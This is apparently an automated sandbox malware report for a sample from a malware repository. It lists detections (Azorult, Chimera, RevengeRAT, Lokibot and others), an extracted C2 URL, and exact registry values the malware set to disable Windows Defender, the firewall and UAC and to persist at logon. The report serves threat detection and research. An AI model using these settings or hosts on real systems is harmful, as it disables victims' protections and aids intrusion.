Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
708s -
max time network
744s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
01/02/2025, 20:31
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win10v2004-20250129-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo
Malware Config
Extracted
azorult
http://boglogov.site/index.php
Extracted
metasploit
encoder/call4_dword_xor
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Chimera 64 IoCs
Ransomware which infects local and network files, often distributed via Dropbox links.
description flow ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\VideoLAN\VLC\plugins\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\VideoLAN\VLC\skins\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Microsoft Office\root\Office16\Configuration\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Java\jre-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Java\jdk-1.8\jre\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\VideoLAN\VLC\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Microsoft Office\root\Office16\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe 86 bot.whatismyipaddress.com Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe -
Chimera Ransomware Loader DLL 1 IoCs
Drops/unpacks executable file which resembles Chimera's Loader.dll.
resource yara_rule behavioral1/memory/3420-883-0x0000000010000000-0x0000000010010000-memory.dmp chimera_loader_dll -
Chimera family
-
Lokibot family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe \"C:\\Windows\\Fonts\\wmsncs.exe\"" wmsncs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" Process not Found -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe -
Modifies firewall policy service 3 TTPs 8 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" wmsncs.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile wmsncs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall = "0" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DoNotAllowExceptions = "0" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DisableNotifications = "1" wmsncs.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile wmsncs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" wmsncs.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" wmsncs.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Modiloader family
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Rms family
-
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe -
Windows security bypass 2 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" wmsncs.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
ModiLoader First Stage 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023d5d-549.dat modiloader_stage1 -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 3048 net.exe 1692 net1.exe -
Renames multiple (1337) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
RevengeRat Executable 1 IoCs
resource yara_rule behavioral1/files/0x000b00000002403c-6290.dat revengerat -
Adds policy Run key to start application 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\status = "present" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\winlogon = "C:\\heap41a\\svchost.exe C:\\heap41a\\std.txt" Process not Found -
Blocklisted process makes network request 10 IoCs
flow pid Process 406 968 rundll32.exe 729 968 rundll32.exe 1086 968 rundll32.exe 1137 968 rundll32.exe 1431 968 rundll32.exe 1738 968 rundll32.exe 2038 968 rundll32.exe 2367 968 rundll32.exe 2669 968 rundll32.exe 2870 968 rundll32.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe Set value (int) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{103L3C30-C3B3-4130-9363-E59E1375PERM} wmsncs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{103L3C30-C3B3-4130-9363-E59E1375PERM}\StubPath = "C:\\Windows\\Fonts\\wmsncs.exe" wmsncs.exe Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Active Setup\Installed Components Process not Found Key created \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Active Setup\Installed Components Process not Found -
Contacts a large (937) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file 22 IoCs
flow pid Process 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 52 1180 msedge.exe 2942 1912 msedge.exe 2942 1912 msedge.exe 2942 1912 msedge.exe 2942 1912 msedge.exe 2942 1912 msedge.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe -
Looks for VMWare Tools registry key 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools Kobalc.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools wmsncs.exe -
Modifies Windows Firewall 2 TTPs 28 IoCs
pid Process 2112 netsh.exe 2776 netsh.exe 4088 netsh.exe 3976 netsh.exe 836 netsh.exe 5348 netsh.exe 4792 netsh.exe 2324 netsh.exe 3116 netsh.exe 4764 netsh.exe 4792 netsh.exe 4184 netsh.exe 1880 netsh.exe 5056 netsh.exe 4556 netsh.exe 4860 netsh.exe 2396 netsh.exe 3028 netsh.exe 4660 netsh.exe 2756 netsh.exe 3552 netsh.exe 2300 netsh.exe 5372 netsh.exe 4064 netsh.exe 4080 netsh.exe 772 netsh.exe 1644 netsh.exe 676 netsh.exe -
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule behavioral1/files/0x000a000000023d84-773.dat office_macro_on_action -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3416 attrib.exe 4548 attrib.exe 1616 attrib.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation AdwereCleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation wini.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation winlogon.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation AdwereCleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation Azorult.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:SmartScreen:$DATA RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe RegSvcs.exe -
Executes dropped EXE 64 IoCs
pid Process 5104 AdwereCleaner.exe 4348 AdwereCleaner.exe 64 6AdwCleaner.exe 1060 6AdwCleaner.exe 4396 AgentTesla.exe 5104 AgentTesla.exe 3420 HawkEye.exe 1756 butterflyondesktop.exe 4836 butterflyondesktop.exe 2564 butterflyondesktop.tmp 4132 butterflyondesktop.tmp 2116 ButterflyOnDesktop.exe 3004 Azorult.exe 1156 Azorult.exe 3176 wini.exe 4204 winit.exe 4216 rutserv.exe 772 rutserv.exe 1644 rutserv.exe 3852 rutserv.exe 2212 rfusclient.exe 2052 rfusclient.exe 2948 cheat.exe 4568 taskhost.exe 4928 P.exe 4152 ink.exe 1596 rfusclient.exe 4640 R8.exe 2756 winlog.exe 2744 Rar.exe 1232 winlogon.exe 3116 taskhostw.exe 2380 RDPWInst.exe 2980 winlogon.exe 4088 RDPWInst.exe 4584 SpySheriff.exe 4432 SpySheriff.exe 5492 taskhostw.exe 4396 Azorult.exe 1692 taskhostw.exe 1492 Lokibot.exe 3320 Opaserv.l.exe 6036 msload.exe 4340 Kobalc.exe 5148 wmsncs.exe 712 DanaBot.exe 6116 taskhostw.exe 4936 Lokibot.exe 5200 NETFramework.exe 3948 NETFramework.exe 1156 Setup.exe 5980 Setup.exe 2912 taskhostw.exe 1332 RevengeRAT.exe 3020 RevengeRAT.exe 